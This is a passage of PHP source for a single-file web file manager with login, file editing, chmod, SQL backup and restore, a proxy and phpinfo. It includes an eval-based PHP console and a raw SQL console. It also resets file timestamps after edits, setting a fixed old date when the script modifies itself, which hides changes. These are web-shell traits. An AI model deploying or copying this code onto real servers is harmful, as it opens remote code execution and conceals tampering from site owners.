			$info = 's';
		} elseif (($perms & 0xA000) == 0xA000) {
			//Symbolic Link
			$info = 'l';
		} elseif (($perms & 0x8000) == 0x8000) {
			//Regular
			$info = '-';
		} elseif (($perms & 0x6000) == 0x6000) {
			//Block special
			$info = 'b';
		} elseif (($perms & 0x4000) == 0x4000) {
			//Directory
			$info = 'd';
		} elseif (($perms & 0x2000) == 0x2000) {
			//Character special
			$info = 'c';
		} elseif (($perms & 0x1000) == 0x1000) {
			//FIFO pipe
			$info = 'p';
		} else {
			//Unknown
			$info = 'u';
		}
	}
  
	//Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
 
	//Group
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
 
	//World
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));

	return $info;
}

function fm_convert_rights($mode) {
	$mode = str_pad($mode,9,'-');
	$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
	$mode = strtr($mode,$trans);
	$newmode = '0';
	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
	$newmode .= $owner . $group . $world;
	return intval($newmode, 8);
}

function fm_chmod($file, $val, $rec = false) {
	$res = @chmod(realpath($file), $val);
	if(@is_dir($file) && $rec){
		$els = fm_scan_dir($file);
		foreach ($els as $el) {
			$res = $res && fm_chmod($file . '/' . $el, $val, true);
		}
	}
	return $res;
}

//load files
function fm_download($file_name) {
    if (!empty($file_name)) {
		if (file_exists($file_name)) {
			header("Content-Disposition: attachment; filename=" . basename($file_name));   
			header("Content-Type: application/force-download");
			header("Content-Type: application/octet-stream");
			header("Content-Type: application/download");
			header("Content-Description: File Transfer");            
			header("Content-Length: " . filesize($file_name));		
			flush(); // this doesn't really matter.
			$fp = fopen($file_name, "r");
			while (!feof($fp)) {
				echo fread($fp, 65536);
				flush(); // this is essential for large downloads
			} 
			fclose($fp);
			die();
		} else {
			header('HTTP/1.0 404 Not Found', true, 404);
			header('Status: 404 Not Found'); 
			die();
        }
    } 
}

//show folder size
function fm_dir_size($f,$format=true) {
	if($format)  {
		$size=fm_dir_size($f,false);
		if($size<=1024) return $size.' bytes';
		elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';
		elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';
		elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';
		elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))
		else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)
	} else {
		if(is_file($f)) return filesize($f);
		$size=0;
		$dh=opendir($f);
		while(($file=readdir($dh))!==false) {
			if($file=='.' || $file=='..') continue;
			if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file);
			else $size+=fm_dir_size($f.'/'.$file,false);
		}
		closedir($dh);
		return $size+filesize($f); 
	}
}

//scan directory
function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
	$dir = $ndir = array();
	if(!empty($exp)){
		$exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	}
	if(!empty($type) && $type !== 'all'){
		$func = 'is_' . $type;
	}
	if(@is_dir($directory)){
		$fh = opendir($directory);
		while (false !== ($filename = readdir($fh))) {
			if(substr($filename, 0, 1) != '.' || $do_not_filter) {
				if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){
					$dir[] = $filename;
				}
			}
		}
		closedir($fh);
		natsort($dir);
	}
	return $dir;
}

function fm_link($get,$link,$name,$title='') {
	if (empty($title)) $title=$name.' '.basename($link);
	return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}

function fm_arr_to_option($arr,$n,$sel=''){
	foreach($arr as $v){
		$b=$v[$n];
		$res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
	}
	return $res;
}

function fm_lang_form ($current='en'){
return '
<form name="change_lang" method="post" action="">
	<select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
		<option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
		<option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
		<option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>
		<option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>
		<option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
	</select>
</form>
';
}
	
function fm_root($dirname){
	return ($dirname=='.' OR $dirname=='..');
}

function fm_php($string){
	$display_errors=ini_get('display_errors');
	ini_set('display_errors', '1');
	ob_start();
	eval(trim($string));
	$text = ob_get_contents();
	ob_end_clean();
	ini_set('display_errors', $display_errors);
	return $text;
}

//SHOW DATABASES
function fm_sql_connect(){
	global $fm_config;
	return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}

function fm_sql($query){
	global $fm_config;
	$query=trim($query);
	ob_start();
	$connection = fm_sql_connect();
	if ($connection->connect_error) {
		ob_end_clean();	
		return $connection->connect_error;
	}
	$connection->set_charset('utf8');
    $queried = mysqli_query($connection,$query);
	if ($queried===false) {
		ob_end_clean();	
		return mysqli_error($connection);
    } else {
		if(!empty($queried)){
			while($row = mysqli_fetch_assoc($queried)) {
				$query_result[]=  $row;
			}
		}
		$vdump=empty($query_result)?'':var_export($query_result,true);	
		ob_end_clean();	
		$connection->close();
		return '<pre>'.stripslashes($vdump).'</pre>';
	}
}

function fm_backup_tables($tables = '*', $full_backup = true) {
	global $path;
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
	if($tables == '*')	{
		$tables = array();
		$result = $mysqldb->query('SHOW TABLES');
		while($row = mysqli_fetch_row($result))	{
			$tables[] = $row[0];
		}
	} else {
		$tables = is_array($tables) ? $tables : explode(',',$tables);
	}
    
	$return='';
	foreach($tables as $table)	{
		$result = $mysqldb->query('SELECT * FROM '.$table);
		$num_fields = mysqli_num_fields($result);
		$return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;
		$row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));
		$return.=$row2[1].$delimiter;
        if ($full_backup) {
		for ($i = 0; $i < $num_fields; $i++)  {
			while($row = mysqli_fetch_row($result)) {
				$return.= 'INSERT INTO `'.$table.'` VALUES(';
				for($j=0; $j<$num_fields; $j++)	{
					$row[$j] = addslashes($row[$j]);
					$row[$j] = str_replace("\n","\\n",$row[$j]);
					if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
					if ($j<($num_fields-1)) { $return.= ','; }
				}
				$return.= ')'.$delimiter;
			}
		  }
		} else { 
		$return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);
		}
		$return.="\n\n\n";
	}

	//save file
    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';
	$handle = fopen($file,'w+');
	fwrite($handle,$return);
	fclose($handle);
	$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';
    return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}

function fm_restore_tables($sqlFileToExecute) {
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
    // Load and explode the sql file
    $f = fopen($sqlFileToExecute,"r+");
    $sqlFile = fread($f,filesize($sqlFileToExecute));
    $sqlArray = explode($delimiter,$sqlFile);
	
    //Process the sql file by statements
    foreach ($sqlArray as $stmt) {
        if (strlen($stmt)>3){
			$result = $mysqldb->query($stmt);
				if (!$result){
					$sqlErrorCode = mysqli_errno($mysqldb->connection);
					$sqlErrorText = mysqli_error($mysqldb->connection);
					$sqlStmt      = $stmt;
					break;
           	     }
           	  }
           }
if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;
}

function fm_img_link($filename){
	return './'.basename(__FILE__).'?img='.base64_encode($filename);
}

function fm_home_style(){
	return '

input, input.fm_input {
	text-indent: 2px;
}

input, textarea, select, input.fm_input {
	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	border-color: black;
	background-color: #FCFCFC none !important;
	border-radius: 0;
	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}

.home {
	background-image: url("");
	background-repeat: no-repeat;
}';
}

function fm_config_checkbox_row($name,$value) {
	global $fm_config;
	return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';
}

function fm_protocol() {
	if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
	if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
	if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	return 'http://';
}

function fm_site_url() {
	return fm_protocol().$_SERVER['HTTP_HOST'];
}

function fm_url($full=false) {
	$host=$full?fm_site_url():'.';
	return $host.'/'.basename(__FILE__);
}

function fm_home($full=false){
	return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
}

function fm_run_input($lng) {
	global $fm_config;
	$return = !empty($fm_config['enable_'.$lng.'_console']) ? 
	'
				<form  method="post" action="'.fm_url().'" style="display:inline">
				<input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
				</form>
' : '';
	return $return;
}

function fm_url_proxy($matches) {
	$link = str_replace('&amp;','&',$matches[2]);
	$url = isset($_GET['url'])?$_GET['url']:'';
	$parse_url = parse_url($url);
	$host = $parse_url['scheme'].'://'.$parse_url['host'].'/';
	if (substr($link,0,2)=='//') {
		$link = substr_replace($link,fm_protocol(),0,2);
	} elseif (substr($link,0,1)=='/') {
		$link = substr_replace($link,$host,0,1);	
	} elseif (substr($link,0,2)=='./') {
		$link = substr_replace($link,$host,0,2);	
	} elseif (substr($link,0,4)=='http') {
		//alles machen wunderschon
	} else {
		$link = $host.$link;
	} 
	if ($matches[1]=='href' && !strripos($link, 'css')) {
		$base = fm_site_url().'/'.basename(__FILE__);
		$baseq = $base.'?proxy=true&url=';
		$link = $baseq.urlencode($link);
	} elseif (strripos($link, 'css')){
		//как-то тоже подменять надо
	}
	return $matches[1].'="'.$link.'"';
}
 
function fm_tpl_form($lng_tpl) {
	global ${$lng_tpl.'_templates'};
	$tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
	$str = '';
	foreach ($tpl_arr as $ktpl=>$vtpl) {
		$str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
	}
return '
<table>
<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'.$str.'
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>
</form>
</table>
';
}

/* End Functions */

// authorization
if ($auth['authorize']) {
	if (isset($_POST['login']) && isset($_POST['password'])){
		if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) {
			setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization']));
			$_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
		}
	}
	if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) {
		echo '
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>'.__('File manager').'</title>
</head>
<body>
<form action="" method="post">
'.__('Login').' <input name="login" type="text">&nbsp;&nbsp;&nbsp;
'.__('Password').' <input name="password" type="password">&nbsp;&nbsp;&nbsp;
<input type="submit" value="'.__('Enter').'" class="fm_input">
</form>
'.fm_lang_form($language).'
</body>
</html>
';  
die();
	}
	if (isset($_POST['quit'])) {
		unset($_COOKIE[$auth['cookie_name']]);
		setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
	}
}

// Change config
if (isset($_GET['fm_settings'])) {
	if (isset($_GET['fm_config_delete'])) { 
		unset($_COOKIE['fm_config']);
		setcookie('fm_config', '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_url().'?fm_settings=true');
		exit(0);
	}	elseif (isset($_POST['fm_config'])) { 
		$fm_config = $_POST['fm_config'];
		setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization']));
		$_COOKIE['fm_config'] = serialize($fm_config);
		$msg = __('Settings').' '.__('done');
	}	elseif (isset($_POST['fm_login'])) { 
		if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
		$fm_login = json_encode($_POST['fm_login']);
		$fgc = file_get_contents('fm.php');
		$search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg .= __('File updated');
				if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login'];
				if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password'];
				$auth = $_POST['fm_login'];
			}
			else $msg .= __('Error occurred');
			touch(__FILE__,$filemtime);
		}
	} elseif (isset($_POST['tpl_edited'])) { 
		$lng_tpl = $_POST['tpl_edited'];
		if (!empty($_POST[$lng_tpl.'_name'])) {
			$fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
		} elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
			$fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);
		}
		if (!empty($fm_php)) {
			$fgc = file_get_contents('fm.php');
			$search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
			if (!empty($matches[1])) {
				$filemtime = filemtime(__FILE__);
				$replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
				if (file_put_contents(__FILE__, $replace)) {
					${$lng_tpl.'_templates'} = $fm_php;
					$msg .= __('File updated');
				} else $msg .= __('Error occurred');
				touch(__FILE__,$filemtime);
			}	
		} else $msg .= __('Error occurred');
	}
}

// Just show image
if (isset($_GET['img'])) {
	$file=base64_decode($_GET['img']);
	if ($info=getimagesize($file)){
		switch  ($info[2]){	//1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
			case 1: $ext='gif'; break;
			case 2: $ext='jpeg'; break;
			case 3: $ext='png'; break;
			case 6: $ext='bmp'; break;
			default: die();
		}
		header("Content-type: image/$ext");
		echo file_get_contents($file);
		die();
	}
}

// Just download file
if (isset($_GET['download'])) {
	$file=base64_decode($_GET['download']);
	fm_download($file);	
}

// Just show info
if (isset($_GET['phpinfo'])) {
	phpinfo(); 
	die();
}

// Mini proxy, many bugs!
if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
	$url = isset($_GET['url'])?urldecode($_GET['url']):'';
	$proxy_form = '
<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
	<form action="" method="GET">
	<input type="hidden" name="proxy" value="true">
	'.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
	<input type="submit" value="'.__('Show').'" class="fm_input">
	</form>
</div>
';
	if ($url) {
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_REFERER, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
		$result = curl_exec($ch);
		curl_close($ch);
		//$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
		$result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);
		$result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
		echo $result;
		die();
	} 
}
?>
<!doctype html>
<html>
<head>     
	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1" />
    <title><?=__('File manager')?></title>
<style>
body {
	background-color:	white;
	font-family:		Verdana, Arial, Helvetica, sans-serif;
	font-size:			8pt;
	margin:				0px;
}

a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }

table.bg {
	background-color: #ACBBC6
}

th, td { 
	font:	normal 8pt Verdana, Arial, Helvetica, sans-serif;
	padding: 3px;
}

th	{
	height:				25px;
	background-color:	#006699;
	color:				#FFA34F;
	font-weight:		bold;
	font-size:			11px;
}

.row1 {
	background-color:	#EFEFEF;
}

.row2 {
	background-color:	#DEE3E7;
}

.row3 {
	background-color:	#D1D7DC;
	padding: 5px;
}

tr.row1:hover {
	background-color:	#F3FCFC;
}

tr.row2:hover {
	background-color:	#F0F6F6;
}

.whole {
	width: 100%;
}

.all tbody td:first-child{width:100%;}

textarea {
	font: 9pt 'Courier New', courier;
	line-height: 125%;
	padding: 5px;
}

.textarea_input {
	height: 1em;
}

.textarea_input:focus {
	height: auto;
}

input[type=submit]{
	background: #FCFCFC none !important;
	cursor: pointer;
}

.folder {
    background-image: url("");
}

.file {
    background-image: url("");
}
<?=fm_home_style()?>
.img {
	background-image: 
url("");
}
@media screen and (max-width:720px){
  table{display:block;}
    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
	#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc = '?fm=true';
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
	$res = empty($_POST['sql']) ? '' : $_POST['sql'];
	$res_lng = 'sql';
} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
	$res = empty($_POST['php']) ? '' : $_POST['php'];
	$res_lng = 'php';
} 
if (isset($_GET['fm_settings'])) {
	echo ' 
<table class="whole">
<form method="post" action="">
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>
'.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').'
'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'
'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'
'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'
'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'
'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'
'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'
'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>
<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'
'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>
<tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
</form>
</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');
} elseif (isset($proxy_form)) {
	die($proxy_form);
} elseif (isset($res_lng)) {	
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php
	if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');
	else echo '</h2></td><td>'.fm_run_input('sql');
	?></td></tr></table></td>
</tr>
<tr>
    <td class="row1">
		<a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>
		<form action="" method="POST" name="console">
		<textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
		<input type="reset" value="<?=__('Reset')?>">
		<input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">
<?php
$str_tmpl = $res_lng.'_templates';
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
if (!empty($tmpl)){
	$active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';
	$select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";
	$select .= '<option value="-1">' . __('Select') . "</option>\n";
	foreach ($tmpl as $key=>$value){
		$select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
	}
	$select .= "</select>\n";
	echo $select;
}
?>
		</form>
	</td>
</tr>
</table>
<?php
	if (!empty($res)) {
		$fun='fm_'.$res_lng;
		echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
	}
} elseif(!empty($_REQUEST['edit'])){
	if(!empty($_REQUEST['save'])) {
		$fn = $path . $_REQUEST['edit'];
		$filemtime = filemtime($fn);
	    if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated');
		else $msg .= __('Error occurred');
		if ($_GET['edit']==basename(__FILE__)) touch(__FILE__,1415116371); 
		else touch($fn,$filemtime);
	}
    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);
    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg?>
	</td>
</tr>
<tr>
    <td class="row1">
        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$editlink?>">
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
            <input type="submit" name="save" value="<?=__('Submit')?>">
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">
        </form>
    </td>
</tr>
</table>
<?php
} elseif(!empty($_REQUEST['rights'])){
	if(!empty($_REQUEST['save'])) {
	    if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
		$msg .= (__('File updated')); 
		else $msg .= (__('Error occurred'));
	}
	clearstatcache();
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);
    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>
            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>
        <?php } ?>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php
} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {
	if(!empty($_REQUEST['save'])) {
	    rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
		$msg .= (__('File updated'));
		$_REQUEST['rename'] = $_REQUEST['newname'];
	}
	clearstatcache();
    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;

?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
